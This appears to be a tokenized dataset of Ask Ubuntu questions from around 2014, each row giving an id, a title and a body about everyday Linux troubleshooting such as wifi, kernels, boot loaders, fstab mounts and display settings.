black screen [ duplicate ] ca n't log in to ubuntu 12.04 ubuntu 12.04 login loop ( without gui )
488689	notes disappeared after update to springseed 2.0	after updating springseed to v2.0 using the 32-bit .deb , my notes from the previous version are gone . everything is apparently stored in ~/.config/springseed . the program itself seems functional ... just no notes . this is clearly a bug , but is there any way i can point springseed to recognize the notes already stored in my user directory ?
488690	can clonezilla copy my primary image partition ( bootable system ) to another partition in the same physical disk	i 'm trying to create an image copy of my bootable partition of lubuntu 14.04 ( /dev/sda1 ) to another partition on the same physical disk ( /dev/sda3 ) , using clonezilla ( 20140518 ) , and selecting device-image option ; but it 's failing with an error message warning there are no umounted disks . does anybody know if i can do this using the same disk or do i need to have a second disk ?
488692	speaker works but headphones do n't	i 'm using ubuntu 13.10 on a notebook asus x450c , my speakers works fine , but , when i try to use headphones , the sound stops , but if i remove the headphones , it keeps playing normally
488693	setup identd in ubuntu 14.04	i have recently installed xchat on my system , only to find out my favorite server requires identd . great , i 've tried everything on the internet to get it to work but nothing does , a little help here ? i found xchat_auth and also compiled it but does n't seem to do anything . so , maybe a tutorial on that or something better , please ?
488698	lost wireless connectivity after installing older kernel	i 've successfully reinstalled the 3.13.0-27-generic kernel but now i do n't have wireless connectivity . i know i did the last time i booted up with that kernel . help ! ?
488699	messed install up with dpkg -- configure -a	i do n't know how i did it but earlier today i was getting an error since i accidentally did a reboot during a routine software update . i looked online and the recommendation was to do a dpkg -- configure -a to resolve the issue . i ran this command , and did another reboot , and now i ca n't even use my system . i am presented with the login screen at a low resolution , keyboard and mouse do not work . i attempted to use recovery mode , but the second it gives me the options to enable screen the keyboard stops working . keyboard works fine on this old 13.10 live cd , as well as in windows xp on the other partition . i attempted to add the options as listed here ( how do i get my usb keyboard to not freeze up in the recovery menu ? ) but am not having any success . any ideas before i do a clean drive wipe ? i may try to re-install 14.04 over 14.04 once i get the iso downloaded as a option , but if not going to have to do a clean install . // edit - actually got this resolved by using the 13.10 `` live '' cd , chrooting , doing sudo apt-get update ; sudo apt-get upgrade ; sudo apt-get distupgrade
488700	dual monitor problem xrandr	using fluxbox with linux mint . i have this script to set dual screen in fluxbox xrandr -- output dp-1 -- off -- output dvi-i-1 -- mode 1600x900 -- pos 1440x0 -- rotate normal -- output dvi-d-1 -- mode 1440x900 -- pos 0x0 -- rotate normal -- output hdmi-1 -- off however my login screen is not extended is there anyway i can set this script to run when the os start ? or ( if possible ) boot linux without any desktop manager , start x and initialize fluxbox in command line .
488702	restore windows 8 gui bootloader	i recently installed windows 7 pro , windows 8.1 pro , and ubuntu 14.04 as a multi-boot on my pc with help from this page . everything works great with the chainloading boot . i can boot into whichever os i want without a problem . the only annoyance i have is that when i go to the windows bootloader from grub , it 's not the windows 8 gui bootloader , it 's the generic black/white boot . how can i restore it to the normal windows 8 bootloader without messing up the way my computer boots ? by the way , before installing ubuntu i chose windows 7 as the default boot ... i do n't know if that has something to do with it .
488703	what ubuntu version should i use	what ubuntu version should i use ? here are the specs . intel celeron 2.80ghz processor lga775 socket motherboard ( asus p5pe-vm ) 2gb ram 80gb hard drive intel 865g + intel ich5 chipset intel extreme graphics 2 thanks in advance bombet
488704	can not open any apps in enlightenment desktop - ubuntu 12.04	i just installed enlightenment desktop on my ubuntu 12.04 lts and i can not open any app . i left clicked on the desktop and all app menus were there but when i went to the application menu nothing . there was no menu is there any other way to open apps in enlightenment ? thanks
488706	netflix desktop nor pipelight are working ?	i was formerly an arch user , but with ubuntu 's netflix-desktop i figured it might be easier to get netflix running . so i installed ubuntu 14.04 alongside arch . i was wrong , it was not easier . both installed correctly . netflix gave me the operating system requirement screen , so i installed a user agent switcher . then , it proceeded but said i needed silverlight . so pipelight did not work . i resorted to netflix desktop . i followed the guide step by step with no displayed errors . but after installing netflix desktop , wine asked me to install two things . i allowed it . after it was done , netflix desktop would n't open . however one question ( netflix desktop does n't launch when i click on it ) led me to entering netflix-desktop -- showdebug this gave me # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # opengl diagnostics # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # direct rendering : yes opengl vendor : intel open source technology center opengl renderer : mesa dri intel ( r ) 945g opengl version : 1.4 mesa 10.1.3 glx version : 1.4 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # firefox # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # rm : can not remove â/home/solas/.wine-browser/drive_c/browser-profile/pluginreg.datâ : no such file or directory /usr/bin/wine-browser : 1 : eval : -no-remote : not found i do n't know what to do .
488710	can not connect to wifi 14.04 lts	so backstory , i had ubuntu on then i wanted to try ziron 8 and dual boot it and i starte not being able to connect to the internet whenever i installed it . so i took my ubuntu live cd , wiped everything and it still does n't work . any help is greatly appreciated . here are the starting commands that most people ask for in the other questions . lsusb bus 002 device 003 : id 04f2 : b2e1 chicony electronics co. , ltd bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lsmod module size used by rfcomm 69160 0 bnep 19624 2 bluetooth 395423 10 bnep , rfcomm arc4 12608 2 snd_hda_codec_hdmi 46207 1 iwldvm 232285 0 uvcvideo 80885 0 snd_hda_codec_conexant 57441 1 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo intel_rapl 18773 0 snd_hda_intel 52355 3 mac80211 626557 1 iwldvm videodev 134688 2 uvcvideo , videobuf2_core rts5139 335409 0 snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel iwlwifi 169932 1 iwldvm x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq mei_me 18627 0 cfg80211 484040 3 iwlwifi , mac80211 , iwldvm mei 82276 1 mei_me kvm 451511 0 snd 69238 17 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi ideapad_laptop 18216 0 joydev 17381 0 soundcore 12680 1 snd lpc_ich 21080 0 sparse_keymap 13948 1 ideapad_laptop mac_hid 13205 0 serio_raw 13462 0 parport_pc 32701 0 ppdev 17671 0 nls_iso8859_1 12713 1 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc dm_crypt 23177 1 usb_storage 62209 0 crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13216 0 aesni_intel 55624 2 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 4 ghash_clmulni_intel , aesni_intel , ablk_helper i915 783703 3 psmouse 102222 0 i2c_algo_bit 13413 1 i915 drm_kms_helper 53081 1 i915 drm 303102 4 i915 , drm_kms_helper ahci 25819 3 libahci 32168 1 ahci video 19476 1 i915 alx 32452 0 mdio 13807 1 alx iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no sudo iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 scan completed : cell 01 - address : 70:56:81 : cd:15:4b channel:7 frequency:2.442 ghz ( channel 7 ) quality=70/70 signal level=-36 dbm encryption key : on essid : '' highway '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000015664e1669d extra : last beacon : 72ms ago ie : unknown : 000748696768776179 ie : unknown : 010882848b960c121824 ie : unknown : 030107 ie : unknown : 0706555320010b1e ie : unknown : 2a0100 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 2d1aad511bffffff0000000000000000000000000000000000000000 ie : unknown : 3d1607000400000000000000000000000000000000000000 ie : unknown : dd180050f2020101010003a4000027a4000042435e0062322f00 ie : unknown : dd0700039301740320 ie : unknown : dd070017f203020180 ie : unknown : dd0e0017f20700010106705681cd154b ie : unknown : dd0b0017f20100010100000007 cell 02 - address : b8:3e:59:83:99:85 channel:7 frequency:2.442 ghz ( channel 7 ) quality=43/70 signal level=-67 dbm encryption key : on essid : '' direct-roku-201 '' bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000e16a5602fe extra : last beacon : 72ms ago ie : unknown : 000f4449524543542d726f6b752d323031 ie : unknown : 01088c129824b048606c ie : unknown : 030107 ie : unknown : 0706513220010b1e ie : unknown : 200100 ie : unknown : 23021200 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 2d1a7c181affff000000000000000000000000000000000000000000 ie : unknown : 3d1607080000000000000000000000000000000000000000 ie : unknown : dd090010180201102c0000 ie : unknown : dd180050f2020101810003a4000027a4000042435e0062322f00 ie : unknown : dd050050f20500 ie : unknown : dd7b0050f204104a0001101044000102103b0001031047001022210203040506070809b83e598399851021000842726f6164636f6d10230006536f66744150102400013010420001301054000800060050f20400011011000f4449524543542d726f6b752d323031100800020108103c0001011049000600372a000120 cell 03 - address : c8 : be:19:70 : af : de channel:1 frequency:2.412 ghz ( channel 1 ) quality=36/70 signal level=-74 dbm encryption key : on essid : '' dlink-afde '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=000000e16746e07e extra : last beacon : 72ms ago ie : unknown : 000a646c696e6b2d41464445 ie : unknown : 010882848b961224486c ie : unknown : 030101 ie : unknown : 2a0104 ie : unknown : 32040c183060 ie : unknown : 2d1a6e1013ffff000001000000000000000000000000000000000000 ie : unknown : 3d1601000600000000000000000000000000000000000000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : 0b05010008127a ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : unknown : dd07000c4303000000 ie : unknown : 0706555320010b10 ie : unknown : dd870050f204104a0001101044000102103b00010310470010bc329e001dd811b28601c8be1970afde10210006442d4c696e6b1023000d442d4c696e6b20526f75746572102400084449522d3832364c1042000830303030303030301054000800060050f2040001101100084449522d3832364c10080002208c103c0001011049000600372a000120
488718	ca n't start gvim from the launcher	i do n't know why i 've been having so many problems with gvim lately , but now i ca n't start it from the launcher . i click on it , and it glows and pulsates for awhile , but after a few seconds it stops pulsating and nothing happens . i created the launcher icon by opening gvim , right-clicking on it and clicking `` lock to launcher '' . i 've tried opening it through nautilus with the right-click context menu , and i 've tried running it through the terminal . both times i would right-click on the icon and click `` lock to launcher '' . both methods have the same result .
488720	brightness keys do not modify actual brightness	i am really new to linux , sorry if this is an easy question . i recently installed ubuntu on an old macbook with next to no issues , except for the fact that the backlight does not respond to the brightness buttons , but they do cause a response in the gui . by using xrandr in the terminal i can change the brightness manually , which makes me think that the buttons are somehow changing the wrong value . basically , i can change the brightness with terminal and not with the brightness keys , and any help on fixing this would be greatly appreciated .
488726	how to open port 9 permanently ?	i want to know how to open port 9 permanently for wake on lan purpose . currently i 've tried using iptables -a input -p udp -sport 9 -j accept , but it is giving me following error : bad argument 9 . any solution regarding this .
488729	webcam does n't work when initiate a group call skype	i have a problem with my webcam when i 'm using conference call / group call in skype . the webcam just does not work . can anyone help me ?
488730	issues with updating : 6/26/2014	i 'm running ubuntu 14.04 lts . everything 's been good so far , but suddenly when i use either the auto-updater or sudo apt-get update , it fails and gives me this error report . w : failed to fetch archive.ubuntu.com/ubuntu/dists/trusty/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch archive.ubuntu.com/ubuntu/dists/trusty-updates/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch archive.ubuntu.com/ubuntu/dists/trusty-backports/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch archive.ubuntu.com/ubuntu/dists/trusty-security/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu/dists/trusty/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . any ideas what to do ?
488735	in ubuntu sdk , how do you search for text which include linebreaks ?	if you ctrl+f in ubuntu sdk to browse through your code , and you paste within the search box a multi-line piece of text , it will fail to find any results . is there a way to get around this limitation ?
488738	copy symbolic link using install command ?	is there a way i can copy a symbolic link ( as a symbolic link instead of the target file ) using the install command ? i have a slink in /home/user1/files/link.txt . i need to copy link.txt ( which is a symbolic link ) to another folder /home/user1/backup/link.txt as a symbolic link and not as a copy of the actual file ... .all using install command . i found that the cp command has -d option . but unfortunately the scripts i use in the project use install command ( to set permissions etc ) . your help is highly appreciated . thanks vivek ragunathan
488739	dual boot windows 7 and ubuntu gnome 14.04 with easybcd ( grub4dos )	setting up windows boot manager to dual boot windows 7 and ubuntu 14.04 was not an easy task . for awhile , i was using the computer 's motherboard boot option to boot to that specific drive that had ubuntu installed on it . after learning more about grub4dos and easybcd , i came up with the following solution using easybcd to dual boot through windows boot manager . used easybcd 2.1.2 select `` add new entry '' click `` neogrub '' tab a ) click install button b ) click configure button c ) notepad opens up titled menu.lst insert the following 3 lines : root ( hd3,0 ) kernel /boot/grub/i386-pc/core.img boot close and save the file . ** note : root ( hdx , y ) may be different depending on how ubuntu was installed . click `` edit boot menu '' highlight neogrub bootloader and rename click save settings exit easybcd this will boot to the grub menu and at this point everything worked fine for me . i have also made a youtube video showing this process . see link below . http : //www.youtube.com/watch ? v=o3zcunclwne
488748	where is recent directory	i suddenly open recent directory . i press ctrl+l to see , what is its path directory . and i saw recent : /// is that a path ? so where is recent directory ? update : or better to say : in terminal if i want to cd recent directory . what do i should inter ?
488750	problems in downloading and installing packages	i am a newbie in ubuntu . i have installed 12.04 lts in my laptop and it was moreover all fine . i want to install packages like wine , vlc , chromium browser , etc i was getting various error messages . 1 ) . package dependencies can not be resolved . chromium-browser : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libudev0 ( > = 147 ) but 175-0ubuntu9.5 is to be installed depends : libx11-6 ( > = 2:1.2.99.901 ) but 2:1.4.99.1-0ubuntu2.2 is to be installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build1 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is to be installed depends : libxi6 ( > = 2:1.2.99.4 ) but 2:1.7.1.901-1ubuntu1~precise1 is to be installed depends : libxss1 but it is not going to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed similarly of others , packages . 2 ) . unable to correct problems , you have held broken packages . i need solution to install the applications and packages and also to fixing this all . i have tried for , sudo apt-get remove libapache2-mod-wsgi sudo apt-get clean sudo apt-get autoclean then sudo apt-get update sudo apt-get install libapache2-mod-wsgi but of no use . please dig me out .. or should i go for removing or changing ubuntu version to other if so please mention . thanks
488752	can not get past dell `` setup '' while installing ubuntu on a usb	i was given a dell dimension e521 , no operating system and a mystery 160gb hard drive . by using a usb flash drive to install ubuntu studio 14.04 , i can not get past the built-in bios ? i keep getting a message +corrupted registry , ... /windows/system32/config/windows '' would n't the ubuntu installer bypass any windows xp installed ? if there even is an operating system ? start ups without the ubuntu usb give me a simple response . `` no operating system '' i have installed linux including ubuntu on a number of pc laptops without any trouble . the current hd can be wiped clean , re-formatted ( there 's nothing needed on it ) . how do i get past the /windows/system32/config/windows ? i have no windows installer . i only want to install linux .
488753	after bringing up openbox , `` aplay -l '' requires sudo . help	folks , i have built a minimal ubuntu server 14.04 + openbox . after i login , and before i run startx , aplay -l displays all devices . however , once i run startx , aplay -l does not work : $ aplay -l displays all devices $ startx now open a terminal window $ aplay -l null discard all samples ( playback ) or generate zero samples ( capture ) wondering what do i need to do to fix this problem . regards , peter
488754	how do i invoke firefox in ubuntu 8.04 hardy heron after an upgrade ?	i have a dell mini 910 running ubuntu 8.04 linux ( hardy heron ) . awhile ago , i inadvertently deleted the flashplayer that came with it . ( of which version i 'm not too sure of right now . ) so ... i was getting by with `` what i could '' , or a modified version of flashplayer . but my problem is this : i recently ran an upgrade and update through the terminal which was successful , but now i can not invoke a web browser ( e.g . firefox ) either from the terminal or the gui . also , how can i know that i have the latest version of flashplayer installed ? ? can you please help in telling me the commands i would need to enter into the terminal so i can get up and running again ? or should i just completely re-install the os ? please help ! thanks you . the following is the error message i get in the terminal when i try to invoke firefox using my old method : ~/firefox/firefox /home/user/firefox/firefox : symbol lookup error : /home/user/firefox/libxul.so : undefined symbol : gtk_widget_set_can_focus
488755	xscreensaver not working properly in lubutu 14.04	i have installed xscreensave using the command in lubuntu 14.04. sudo apt-get install xscreensaver xscreensaver-data-extra xscreensaver-gl-extra after installing , when i try to launch the screensaver , my system automatically hangs . input devices are not working . i need to power off and on the system to reboot . please help me to fix the issue . the issue should be fixed in lubuntu 14.04 ( lts )
488756	can not hibernate on lubuntu 14.04	i get this error - slightly different to all the others i 've seen as it says `` supported '' at the end : gdbus.error : org.freedesktop.dbus.error.failed : operation not supported
488759	installation for intuos pen and touch	i recently purchased a wacom intuos pen and touch tablet . i tried to hook it up to my toshiba laptop running on ubuntu 14.04 , but a black screen with code written in white letters shows up . i 've tried various installation methods after sifting through many different websites , but to no avail . please advise me on what to do . thank you .
488762	formating window without affecting ubuntu	i have installed ubunto 10.04 with the help of vmware workstation . now i want to format window xp without affecting ubuntu and ns 2.29 which is installed in ubuntu , is it possible ?
488763	small modification turned into a huge problem - i think my system has been hacked	i 'll try to keep this brief , but i set the permissions for /usr/bin/ to -r using chown . i later read when i could n't seem to log in as su that this may have compromised my complete system security . i tried to change the password for root using recovery mode by the commands : chown root : root /usr/bin/sudo chmod 4755 /usr/bin/sudo i 'm not sure if the change of password worked or not because on reboot my graphics drivers seem to messed up and xwindows will not start . it flashes at a screen that says my clam av daemon has failed to load . this is another red flag . i ca n't get into failsafe xwindows because it says that a samba share is not available and is referenced in /etc/fstab . this is true . i ca n't seem to edit /etc/fstab with vim because it tells me it 's a readonly file . i ca n't get into a root shell but with my obviously limited knowledge of linux i 'm not really sure what to try next ... i 've tried changing passwd in root shell but that does n't seem to work . basically now my system is unbootable in either regular mode or recovery mode with failsafe xwindows . do you think i 've been hacked or is there any fix for this ?
488766	ubuntu wont mount any partitions	so my laptop currently dual boots windows 7 and ubuntu ( trusty ) . i also had steamos , but i deleted the partitions for that and made a new one , which i plan to use as a steam library folder for my ubuntu steam . the problem is , the partition wo n't mount through fstab . ( and for as long as i can remember , neither can the swap partition , but my computer still works ) whenever i boot now , it says it ca n't mount a uuid , which is my swap , then it says it ca n't mount the device for /steamgames because it does n't exist or is n't ready ( i did make a /steamgames folder ) , and i do n't know what that means . if i run sudo mount /dev/sda7 /steamgames in terminal it mounts . this is my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=77d5e8aa-9546-4c1e-993f-b646ffd7f682 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=1a7e9662-5315-4337-92d0-b95364dfd26e none swap sw 0 0 uuid=886786d4-b7fb-43c1-9911-a9bdaac796bf /steamgames ext4 defaults 0 2 what should i do to get everything to mount properly ?
488769	enterprise support for juju	from whatever i have read and come to know about juju , it is still a very much open source project . does it also have an enterprise version/support subscription ? more akin to chef hosted services and puppet enterprise ( enterprise grade versions and support for open source tools ) . would using ubuntu openstack with juju help support for juju at any level from ubuntu advantage/cannonical ? thanks !
488770	`` c : \boot.ini file can not be opened . operating system and timeout settings can not be changed ''	i am a newbie trying to get ubuntu to work alongside windows xp . i 've downloaded wubi but the window boot manager is not displaying ubuntu as an option when i reboot . the system goes directly to windows . it only displays windows when i press f8 at startup . i thought maybe the issue is that the time-out setting was set to `` zero '' . when i click on the settings for `` startup and recovery '' a pop-up states : c : /boot.ini file can not be opened . operating system and timeout settings can not be changed . however , even as an administrator i am unable to change the time setting . thanks in advance .
488772	failed to load monitor configuration after ubuntu ( 12.04lts ) update	i 've updated my ubuntu 12.04lts and after restarting machin , now i see this error on startup : and when try to download nvidia driver from here : i see this error : i 'm beginner , please help !
488774	ubuntu 14.04 gui not working after login	yesterday i update ubuntu 14.04 . it asked to restart the pc , after restarting it and logging into my account , only wallpaper is displayed . i tried the following by pressing ctrl+alt+f1 : sudo apt-get update sudo apt-get install - - reinstall ubuntu-desktop sudo apt-get install unity then i restated it , but still it still was n't fixed . please help . ps . i was fed-up with ubuntu 14.04 not working , so decided to install ubuntu 13.10 as i have it on dvd . while installing it , it said that no operating system detected . does that mean that ubuntu 14.04 was partly deleted , or ubuntu does n't recognizes it 's own operating system ?
488775	problem : displaying multiple desktops in my system ( 12.04 )	i recently upgraded from 11.10 to 12.04 but the display is showing with multiple desktops , how could i change it to a single screen . fyi..its running on a vm player on a desktop .
488776	bluetooth permanently on in 14.04	just updated 14.04 and now bluetooth is permanently on . disabling on the bar does not work ; disabling via the system settings menu does not work either ; i already had , before the update , set initiallypowered = false in /etc/bluetooth/main.conf ; issuing the command $ rfkill block bluetooth does not work ( also tried with sudo ) ; i 've rebooted after the update , twice , but did not help either . i 'd like to have it switched off on boot , but still be able to enable it when i need it . any solutions ?
488777	how to safely update software with a non-standard kernel ?	background i have an asus ux302la laptop running ubuntu 14.04 . as the default kernel mainline ( 3.13 . * ) is incompatible with the geforce graphics card it ships with i switched to to a drm-intel-nightly kernel as described here ( after struggling with it for months ) . although it is named trusty it 's version is 3.15.0-994 making me suspect it was a misnamed utopic unicorn kernel . later versions of the utopic kernels are also confirmed to be working . question since then i have n't dared to update anything related to `` ubuntu base '' in fear that it would replace my nightly kernel with the default , ruining the graphics again . however , a lot of updates have piled up so if somebody could tell me what is safe to update and what to avoid i 'd be most grateful . can i for instance just deselect all entries containing the word kernel ? is it a better idea to switch and follow the 3.15 mainline kernels instead as described here ?
488779	google chrome suddenly started to misbehave / crash	everything was working fine with chrome until today it started to misbehave after use of 10-15 min . i 've reinstalled chrome once but that did n't helped out ! !
488781	mouse uber sensitive in firefox	this is only a problem with firefox and only recently . within other programs i can highlight text , copy , paste , etc . with no issues . within firefox it 's becoming impossible . the page scrolls up and down with lightning speed and i can not select anything . i have tried reducing mouse sensitivity but this is only a firefox issue and adjusting the sensitivity globally makes no difference . help !
488782	ubuntu gnome3 desktop interface , boot log	i have the following problem : after installing xfce on ubuntu 14.04 , i also installed gnome 3 . i switched to gnome 3 desktop environment . by mistake i made my system to suspend . now each time i start my laptop i find myself with a black screen that does not say a thing . my workaround is to startx from another tty . is there a log i could check to see what happened ? i checked dmesg but there 's too much noise for me to understand where the problem is .
488783	ubuntu 14.04 + pyes 0.99.2 + elasticsearch 1.2.1	im using ubuntu 14.04 in a django project with elasticsearch and after i install pyes with pip install pyes==0.99.2 and try to acces to the elasticsearch page , it returns an error from the os : 'module ' object has no attribute 'py2 ' this is the django error , but i 'm pretty sure the problem cames from a lack of software or something related with the os . does anyone has a similar issue using pyes 0.99.2 ? i 've read looking for another packaged i needed to install or any action i need to do after the installation and did n't find any usefull information edit im using haystack 2.0.0
488785	linking with versioned shared libraries	i 've been using ubuntu for a couple of years now and a problem that i consistently come across is with linking against particular versions of shared object files . for example , i 'm trying to install igraph and it 's giving me an error stating that it ca n't find the library lxml2 . i have the synaptic libxml2 package installed , so i just need to find the shared objects and set up the links . so here 's how i solve the problem : jake @ linux : ~/code/rl/setup $ locate libxml2.so /usr/lib/x86_64-linux-gnu/libxml2.so.2 /usr/lib/x86_64-linux-gnu/libxml2.so.2.7.8 jake @ linux : ~/code/rl/setup $ sudo ln -sf /usr/lib/x86_64-linux-gnu/libxml2.so.2 /usr/lib/x86_64-linux-gnu/libxml2.so this kind of issue happens all the time and it seems like it 's something that the os should handle . so i end up asking myself , `` why is n't the linker looking for specific versions of shared objects ? why is n't synaptic creating these links on its own ? '' is there some better way of handling these issues ? is there a tool , or a best practice , or some other solution so that i do n't have to repeatedly find and link my sos manually ? or am i looking at this the wrong way ? thanks !
488788	ca n't install skype	hiii , i want to ask you something : i ca n't install skype , i tried with the terminal ( after all was done , i could not find skype ) , the with software center , and when i click install , after some time it stops . how can i install skype ?
488792	bash : write the output of a command to a file	i run a program multible time using a bash script , and i want it 's output to be written in a file . however , i could n't make the operator `` > filename.txt '' work ... here is my script : for i in { 1..10000000..10000 } do time ./merge $ i > nn done can somebody help me out ? update : the answer is : { time ./merge $ i ; } 2 > > time.txt
488793	keyboard layout is us even though it 's set to uk	i have deleted the us keyboard layout , the uk one is only one available in /etc/default/keyboard you can see the layout is set to 'gb' xkbmodel= '' pc105 '' xkblayout= '' gb '' xkbvariant= '' '' xkboptions= '' '' but when i press `` the output is still @ ( which i 'm sure is the us layout ) . this command fixes the problem but i have to run it every time i reboot . sudo dpkg-reconfigure keyboard-configuration is there anyway to permanently set the layout to uk ? other questions on this site have suggested doing the above but like i said it 's not permanent and changing /etc/default/keyboard does nothing for me so please do n't mark this as duplicate .
488794	automatic display detection not working correctly anymore on ubuntu 14.04 lts	is there a way to check history of all updates automatically installed by `` software & updates '' ? today after updating some packages , automatic detection of connected displays was somehow changed . i am not able to use my t520+docking with additional 2 displays anymore ( means triple heads all together ) . it was working before today 's updates . how to check history of automatic updates ( today 's updates list ) ?
488799	syndaemon deactivates two finger scrolling and tapping	i am running ubuntu 14.04 with an elantech touchpad and have multiple issues . the worst of all is that the standard `` deactivate while typing option '' is not working and if i activate syndaemon ( syndaemon -i 1 -k -d ) as soon as i type and syndaemon deactivates the touchpad , two finger scrolling and touchpad tapping does not work anymore ... sometimes the mouse even completely freezes . is there anything i can do ? thank you !
488800	wireless mouse suddenly `` drunk '' iff dongle in usb hub i 've always had it in	woke up computer today , started trying to work , and suddenly my wireless mouse ( logitech m325 ) was acting `` drunk '' . after a bunch of messing around , i figured out that it only has this problem if it 's plugged in through the usb hub i usually use . where it has always been plugged in before . what . edit : oh wait no after a bit more messing around i think it 's more like this : i have three usb slots in my netbook , two on the left and one on the right . the mouse is only not drunk if i plug it in to the slot on the right . plugging it in directly through the other two , or indirectly through the hub into any of the three slots , gets the drunkness . ( wireless keyboard may also be acting a tiny bit laggy when plugged in to any of those problem slots ? if it is , the effect is so slight that i could easily be imagining it . )
488802	issues after cleaning out old kernels and system update resulting in latest update 3.13.0-30-generic	i just had an issue running system update ( not enough space on /boot ) . so i found a solution on askubuntu suggesting that i free up space by deleting old kernels . so just to play it safe i only deleted those older than two revisions ago . i was on 3.13.0-29 so i skipped 3.13.0-27 and only deleted those older than and including 3.13.0-24 . this solved the space problem so i then ran the system update which has updated me to latest update 3.13.0-30-generic but now i am finding my system is very sluggish . i am not sure if it is related but my chrome app is also not starting up .
488803	ubuntu raid failure [ get a warning ]	okay i might sound paranoid , but every day i think that my harddrives in both my servers failed for some reason and i am going to lose all my data . i have a server with a raid 5 installation with ubuntu [ pretty sure it 's hardware raid ] i also have another server with raid 1 [ pretty sure it is software raid even though i have to enter the raid in the bios , but during the installation ubuntu asks to activate serial ata raid ] is there any ways to monitor both raid 's and maybe make the servers beep or send me an e-mail in an easy way ? also the server with the raid 1 runs extremely faster than the one with the raid 5 , is it because of the raid or is it because of something else ? thanks so much !
